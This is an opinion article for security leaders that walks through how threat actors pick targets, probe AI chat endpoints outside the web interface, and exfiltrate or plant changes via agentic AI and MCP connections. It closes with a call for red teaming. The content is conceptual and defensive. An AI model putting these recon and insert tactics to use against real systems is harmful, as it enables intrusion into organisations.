For CISOs already grappling with traditional infosec, AI is a whole new headache. Now, anywhere you introduce AI or make existing tech accessible via AI – whether it’s a factory, lab or office environment – there’s a brand new attack surface that’s zero days old.
We have already seen vulnerabilities in all the leading AI models, including ChatGPT, Gemini, Llama and DeepSeek-R1. With organizations moving to connect AI agents to their wider systems, threat actors are certainly moving in parallel, probing AI as an entry point. If they succeed, the blast radius of an attack can be exponential.
Understanding how attackers operate is key to establishing a strong security posture in the AI era. Analyzing the stages of an attack helps to identify vulnerabilities and lays the groundwork for proactively strengthening defenses, preventing potential damage.
The Old ‘Rules’ Apply
An organized attacker will have a clear objective, what they aim to achieve with their attack. Their focus then moves to the domain; if the objective is to harm a nation state, for example, the domains include the health sector, banking system or air traffic control.
Domain selection is important for threat actors because each domain has different security rules, regulations and defenses. Financial services is one of the most protected domains globally, while health services are historically poor at infosec. Even in well-protected systems, however, AI is opening new access routes for attackers.
After domain selection comes specific target selection. If the objective is to commit fraud on insurance companies, there are many targets to choose from, based on attributes including size, location and security standards. Companies trumpeting AI adoption without adequate AI security controls may find themselves targeted; first mover advantage has its disadvantages too.
Studying the Target
Once the target is identified, the threat actor shifts to recon: what are the accessible assets that can be targeted? The important word is ‘accessible’. Accessible assets are typically things that people interact with such as websites, mobile apps, ATMs and public-facing servers.
Threat actors go beyond the obvious, however. An organization may have many network points that aren’t often used; if one is accidentally left live, it could be exploited to access critical systems. Agentic AI must now be taken into consideration: as AI is increasingly connected to both virtual and physical entities, are assets that were previously beyond reach now accessible?
For an attacker, vulnerability probing is the simplest, most efficient way of finding access to your systems. There are many ways to do it and AI has opened new avenues, including at the inference layer, where an AI model meets an everyday use case.
Exposing AI’s Anatomy
This is where things get technical. To probe an AI application, instead of using the web chat interface, attackers will use ‘View Source’ on the relevant website. Clicking on the ‘Network’ tab, they can see the endpoint that a chat goes to when it is typed into an AI application.
The attacker can isolate that endpoint through their command terminal, rather than through the website, and get the raw response back. That allows them to seek out items that aren’t displayed by the website route, such as extra meta that offers a hint on how to further their attack.
At this point, a hacker is making progress. If they initially identified six assets and two showed useful meta, they now have their first potential angles of access. The less vulnerable assets can be parked for now, though the attacker may return for a deeper look if their first options are unsuccessful.
An Arsenal of Options
A serious threat actor will have an arsenal of tools, allowing them to pursue a ratcheted attack. Put simply, they will start with their cheapest and quickest attacks, and avoid exposing their best attack; no grandmaster will show their most intricate chess move when using a pawn will do the job.
Sophisticated attack weapons are valuable but, once identified, they are likely to be protected against in future and become obsolete. For this reason, an attacker is likely to cycle through targeting a number of assets with low-to-midpoint attack methods, rather than risking their most prized weapon.
There are exceptions, of course: if the target is valuable enough, the attacker may choose to escalate to their most sophisticated weaponry.
Attack Outcomes
A successful attack has one of two possible outcomes: exfiltrate or insert. Exfiltrate is the more straightforward of the two and involves extracting something of value from the target, such as money, financial data or sensitive customer information.
With agentic AI, the risks are raised. It is becoming common for agentic AI systems to use Model Context Protocol (MCP) – promoted by Anthropic and others – as an open standard to interface with applications such as browsers and business tools.
Browsers, of course, are the window pane to access everything from email systems to bank accounts and booking engines. Business tools have access to proprietary information. In this environment, anything connected to agentic AI via MCP has to be seen as a significant new attack surface.
Insert attacks are more difficult and can be more damaging. Consider the analogy of your home being broken into: the immediate concern will be about what was taken, but what if the intruder left a camera and can watch your every move?
In the digital domain, agentic AI that has access to browsers and applications via MCP opens up new routes for sophisticated insert attacks. Think of modifying a log endpoint to send logs to an external collector, or changing a physical security schedule to turn off at weekends.
A threat actor will also be thinking about lateral movement in an attack. An initial incursion might yield access to a laptop used by a mid-level manager but that offers potential to move about within the system and find a path to escalating privileges to a more senior level.
The Open Source Handbook
As with everything in AI, the attack environment is evolving rapidly. The creators of the first models kept their inner workings under wraps but DeepSeek’s open source approach has effectively put a handbook for its R1 model in the public domain, a game-changer for developers and threat actors alike.
Over 7,000 derivatives of R1 have already been created since its launch in late January, and the provenance of many of these is effectively unknown. While code sharing is welcome for innovation, threat actors are undoubtedly probing R1’s workings for ways to attack existing and future AI models.
This is how threat actors think – and we in the security community have to keep pace.
It’s clear that robust defensive and offensive security measures – including proactive and persistent red teaming of AI models and applications – are essential to mitigate potential risks. As in the medical world, preventive care is preferable to a post mortem.